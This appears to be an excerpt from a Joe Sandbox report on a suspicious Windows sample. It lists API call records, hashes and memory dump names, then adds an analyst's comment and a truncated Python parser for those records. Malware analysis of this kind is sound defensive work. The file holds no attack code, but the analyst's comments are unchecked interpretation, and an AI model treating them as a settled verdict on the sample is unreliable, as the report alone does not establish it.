                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00D92C04,?,20001004,00000000,00000002,?,?,00D91B16), ref: 00D980A0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: InfoLocale
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2299586839-0
                                                                                                                  APIs
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0000B761), ref: 00D8B645
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3192549508-0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: HeapProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 54951025-0
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a0907baeb3b7986130046a6955fb8050eedc45ce42398b13137112e4e65b2121
                                                                                                                  • Instruction ID: 25a2f028c61bc3b2c8eef277b50fb991164557d298ca31f6b83c76cce624c355
                                                                                                                  • Opcode Fuzzy Hash: a0907baeb3b7986130046a6955fb8050eedc45ce42398b13137112e4e65b2121
                                                                                                                  • Instruction Fuzzy Hash: F55177B4D1020A9FCB40DFA8D591AEEBBF4EB09350F24545AE815FB210E634AA41CFA5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: a71f0eae71ac0437cfc89747f09ac92ea174a64d373775db1beab66c8ca7f672
                                                                                                                  • Instruction ID: bfb3e9d1acac1dbb3a61a4f247fd20356cb29c9a64a72400f978c420e92b6908
                                                                                                                  • Opcode Fuzzy Hash: a71f0eae71ac0437cfc89747f09ac92ea174a64d373775db1beab66c8ca7f672
                                                                                                                  • Instruction Fuzzy Hash: B1D0923A645A58EFC211CF49E440D41F7B8FB8D670B154166EA0893B20C331FC11CAE0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 127012223-0
                                                                                                                  • Opcode ID: 4e5c5a88b65927b853927d8ab3a5c24a0a31eb24433dd80fcdd3c0c1abc90d49
                                                                                                                  • Instruction ID: 94116349f33835ac8efebb53bf97aa351e812ae422b8ae87821aac27f75c9535
                                                                                                                  • Opcode Fuzzy Hash: 4e5c5a88b65927b853927d8ab3a5c24a0a31eb24433dd80fcdd3c0c1abc90d49
                                                                                                                  • Instruction Fuzzy Hash: 8671E472904606AFDF21AE649C41FAF7BA9DF46310F2C005AFD54A7285EB35DE4087B1
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00D8BCAC
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D8BCD8
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00D8BD17
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D8BD34
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D8BD73
                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00D8BD90
                                                                                                                  • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D8BDD2
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D8BDF5
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2040435927-0
                                                                                                                  • Opcode ID: 2ddaaa7603d62676d94886a1c08aa48b840ef0b90cc30afdd411419d588edd54
                                                                                                                  • Instruction ID: 4244f9e138224a7785dc4f17ce47585284e1022e24fd95451c5802de54d36dbe
                                                                                                                  • Opcode Fuzzy Hash: 2ddaaa7603d62676d94886a1c08aa48b840ef0b90cc30afdd411419d588edd54
                                                                                                                  • Instruction Fuzzy Hash: 2A518E72600206FFEF216F61CC45FAB7BA9EB44760F29412AFA15E6190DB34DD118BB0
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _strrchr
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3213747228-0
                                                                                                                  • Opcode ID: 8e0f97e4647312b9ceead5f539edeb0fd48669250f67cc87fd716c991951b375
                                                                                                                  • Instruction ID: fd437cda39d1fbcfdcdadfb376c9d5b68b520caf9c4d8970326f8ac2a40bac8f
                                                                                                                  • Opcode Fuzzy Hash: 8e0f97e4647312b9ceead5f539edeb0fd48669250f67cc87fd716c991951b375
                                                                                                                  • Instruction Fuzzy Hash: 4DB10473A002659FDF118F6CCC82BAEBBA5EF55350F198155E948AB282D274D901C7F2
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CBD7
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00D8CBDF
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CC68
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00D8CC93
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00D8CCE8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: 50228187dd9e6d530b13f8f07a6caccd686cc025b377d21228d84dc99a896472
                                                                                                                  • Instruction ID: af0a66af44b1706bacb058701c8f7702600fa734a9b50d2388e8e532ab84b1cf
                                                                                                                  • Opcode Fuzzy Hash: 50228187dd9e6d530b13f8f07a6caccd686cc025b377d21228d84dc99a896472
                                                                                                                  • Instruction Fuzzy Hash: 6E41E334A20218EFCF10EF68C885A9EBBB1EF45314F188155E8199B362D731EE15CBB5
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D8BEE2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D8BEF0
                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00D8BF01
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                  • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                  • API String ID: 667068680-1047828073
                                                                                                                  • Opcode ID: 9a1c216be92cfcee9da137fe35af252484d8db07521685a09b155faafa28ffb2
                                                                                                                  • Instruction ID: 19d8e03ab6a69d5fd0a37f06f6cb00b76ab536f4c2ccc15aec5c1cad734ee3eb
                                                                                                                  • Opcode Fuzzy Hash: 9a1c216be92cfcee9da137fe35af252484d8db07521685a09b155faafa28ffb2
                                                                                                                  • Instruction Fuzzy Hash: 6FD09E79656354EF97005B707C098973FA5DA467513068257F411D3361E6B455048F71
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fedbaff18f8ff3be7eb12db09e62ba8ae1ddbb6fc60e3bdc30a8b8740d529edc
                                                                                                                  • Instruction ID: 9fde8fe4765b691de3f7480fb4ae948adc3b830f939116c0148592ad12856904
                                                                                                                  • Opcode Fuzzy Hash: fedbaff18f8ff3be7eb12db09e62ba8ae1ddbb6fc60e3bdc30a8b8740d529edc
                                                                                                                  • Instruction Fuzzy Hash: CCB1BF70A04349EFDF11DFA8C881BAE7FB1EF46310F184258E955A7292C7709942CBB4
                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(?,?,00D96109,00D8C977,00D8B7A5), ref: 00D96120
                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D9612E
                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D96147
                                                                                                                  • SetLastError.KERNEL32(00000000,00D96109,00D8C977,00D8B7A5), ref: 00D96199
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3852720340-0
                                                                                                                  • Opcode ID: 0035f18ff522f1af74ec2c0e672364ff2e7a63bac5002f2bf9c2899e9507d548
                                                                                                                  • Instruction ID: 16bc964f738a95ecc7bb5bb947a7a3ceec3d2c6342a0ab1991cfdfcf6ed449d1
                                                                                                                  • Opcode Fuzzy Hash: 0035f18ff522f1af74ec2c0e672364ff2e7a63bac5002f2bf9c2899e9507d548
                                                                                                                  • Instruction Fuzzy Hash: 8E01F737259711DEAF352BB47C859672AA5EB263B5724032AF525B12F2FF118C0193B0
                                                                                                                  APIs
                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 00D96AF9
                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 00D96D72
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CallUnexpectedtype_info::operator==
                                                                                                                  • String ID: csm$csm$csm
                                                                                                                  • API String ID: 2673424686-393685449
                                                                                                                  • Opcode ID: a8919f4f340507b368960ee5ad4040ebd8ba3d60bf2070109aa8fcce5536c032
                                                                                                                  • Instruction ID: f956a5fab7dc8a88a64835b240b149a3b43fff6b8648a60a86929b176905b27c
                                                                                                                  • Opcode Fuzzy Hash: a8919f4f340507b368960ee5ad4040ebd8ba3d60bf2070109aa8fcce5536c032
                                                                                                                  • Instruction Fuzzy Hash: A8B158B1900209EFCF29DFA4C9819AEBBB5FF14314F18415AF815AB212D731EA51CBB1
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClassHandleMessageModuleRegister
                                                                                                                  • String ID: ($Melon
                                                                                                                  • API String ID: 1585107554-1480228127
                                                                                                                  • Opcode ID: c4e82eb5e8d92fd385369b593bbcda31f89ac022814f77823c5117a7f2b60929
                                                                                                                  • Instruction ID: 5d2e06aff7418538b31cabcf21c2b7033203aba761094ced71b8820f7877d8c0
                                                                                                                  • Opcode Fuzzy Hash: c4e82eb5e8d92fd385369b593bbcda31f89ac022814f77823c5117a7f2b60929
                                                                                                                  • Instruction Fuzzy Hash: 5021B6B0905308DFDB44EFA8E58979EBBF0FB48300F50892AE44AD7354E77499489F66
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6FF93721,?,?,00000000,00DA7345,000000FF,?,00D9145E,00000002,?,00D914FA,00D9415D), ref: 00D913D2
                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D913E4
                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00DA7345,000000FF,?,00D9145E,00000002,?,00D914FA,00D9415D), ref: 00D91406
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1739631448.0000000000D81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.1739612609.0000000000D80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739654667.0000000000DA8000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739669444.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739682451.0000000000DB3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739694978.0000000000DB5000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739708743.0000000000DB7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.1739724826.0000000000DBA000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_d80000_X2hna87N3Y.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                  • Opcode ID: 0a094d671be87879b81e197280ddcf4fc8ec8b8b0401ae4f45415b3cc1bf3884
                                                                                                                  • Instruction ID: d256b81d1e4b8afddf0bfd19b2d51447c9fc1503f627552f2d7acdb6e67df790
                                                                                                                  • Opcode Fuzzy Hash: 0a094d671be87879b81e197280ddcf4fc8ec8b8b0401ae4f45415b3cc1bf3884
                                                                                                                  • Instruction Fuzzy Hash: D0016735A4461AEFDF159F54CC09FAFBBB8FB44B11F044629E821E2790DB749900CA60
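                                                                                                                   The record above (GetModuleHandleExW on mscoree.dll, GetProcAddress of CorExitProcess, FreeLibrary) is the MSVC C runtime's exit path, which lets a loaded CLR shut down cleanly; it is compiler-generated library code, not stealer logic. The same holds for the LoadLibraryExW/GetLastError/LoadLibraryExW triple further down, where the CRT tries LOAD_LIBRARY_SEARCH_SYSTEM32 (0x800) and retries with flags 0 on older Windows while resolving InitializeCriticalSectionEx. In a report of this size it pays to pull run-time import resolution out mechanically and to read the region flags encoded in the .sdmp names rather than scanning by eye. The Python below is an added example for this page, not Joe Security's code and not part of the report: it parses API reference lines exactly as printed here and decodes the dotted .sdmp filename. The field layout of that filename is an assumption inferred from the values on this page (field 5 takes exactly the Win32 PAGE_* values, field 7 is 0x01000000 = MEM_IMAGE); the PAGE_* and MEM_* constants themselves are the documented winnt.h values. The sample record lines are copied from the CorExitProcess record above.

```python
"""Decode Joe Sandbox function-record lines: .sdmp dump names and API references.

Added example for this page; not Joe Security's code. The role of each dotted
field in the .sdmp filename is an ASSUMPTION inferred from the report's values
(field 5 matches Win32 PAGE_* constants, field 7 is 0x01000000 = MEM_IMAGE).
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Win32 memory protection constants from winnt.h (documented values).
PAGE_PROTECTION: Dict[int, str] = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
# Win32 memory type constants from winnt.h (documented values).
MEM_TYPE: Dict[int, str] = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# APIs that mean the function resolves imports at run time. The MSVC CRT does this
# itself (CorExitProcess lookup, downlevel thunks), so a hit is a lead, not a verdict.
DYNAMIC_RESOLUTION = {"LoadLibraryExW", "LoadLibraryW", "LoadLibraryA",
                      "GetProcAddress", "GetModuleHandleExW", "GetModuleHandleW"}


@dataclass
class DumpName:
    process_index: int   # field 1 (assumed role): process number in the analysis
    phase: int           # field 2 (assumed role): dump phase
    dump_id: str         # field 3: opaque identifier, kept verbatim
    base_address: int    # field 4 (assumed role): region base address
    protection: str      # field 5 (assumed role): PAGE_* name
    mem_type: str        # field 7 (assumed role): MEM_* name


def parse_dump_name(name: str) -> DumpName:
    """Split a dotted .sdmp filename into its fields and decode the Win32 flags."""
    stem = name[:-5] if name.endswith(".sdmp") else name
    parts = stem.split(".")
    if len(parts) != 8:
        raise ValueError(f"unexpected .sdmp name layout: {name!r}")
    prot, mtype = int(parts[4], 16), int(parts[6], 16)
    return DumpName(
        process_index=int(parts[0], 16), phase=int(parts[1], 16), dump_id=parts[2],
        base_address=int(parts[3], 16),
        protection=PAGE_PROTECTION.get(prot, f"0x{prot:X}"),
        mem_type=MEM_TYPE.get(mtype, f"0x{mtype:X}"),
    )


@dataclass
class ApiRef:
    api: str                          # "GetProcAddress" or "std::_Lockit::_Lockit"
    module: str                       # "KERNEL32", "LIBCMT", ...
    args: List[str]                   # stack arguments as printed ("?" = unknown)
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # callee start for "Part of subcall function" lines


_SUBCALL = re.compile(r"^Part of subcall function ([0-9A-Fa-f]+):\s*(.*)$")
_HEX_OR_UNKNOWN = re.compile(r"[0-9A-Fa-f?]+")


def parse_api_ref(line: str) -> Optional[ApiRef]:
    """Parse one 'Name.MODULE(args), ref: ADDR' line; return None for non-API lines."""
    text = line.strip().lstrip("•").strip()
    subcall = None
    m = _SUBCALL.match(text)
    if m:
        subcall, text = int(m.group(1), 16), m.group(2)
    if " ref: " not in text:
        return None
    call, ref_hex = text.rsplit(" ref: ", 1)
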